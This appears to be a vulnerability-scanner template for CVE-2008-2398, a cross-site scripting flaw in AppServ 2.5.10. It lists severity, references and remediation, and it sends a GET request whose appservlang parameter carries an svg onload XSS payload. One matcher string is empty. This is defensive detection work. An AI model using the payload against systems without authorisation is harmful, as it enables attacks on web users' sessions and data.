id: CVE-2008-2398 info: name: AppServ Open Project <=2.5.10 - Cross-Site Scripting author: unstabl3 severity: medium description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor. reference: - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 - http://securityreason.com/securityalert/3896 - https://nvd.nist.gov/vuln/detail/CVE-2008-2398 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-2398 cwe-id: CWE-79 epss-score: 0.00329 epss-percentile: 0.67745 cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: appserv_open_project product: appserv tags: cve,cve2008,xss,appserv_open_project http: - method: GET path: - "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a00463044022042436195e99587054a6a10ee089470c1fadab498fe1b556fc0cdcde579d92d5602201b1af0719bba0f8007ca800e10004e6be93d7ec53b7ec4fe0f627c5372dcdca9:922c64590222798bb761d5b6d8e72950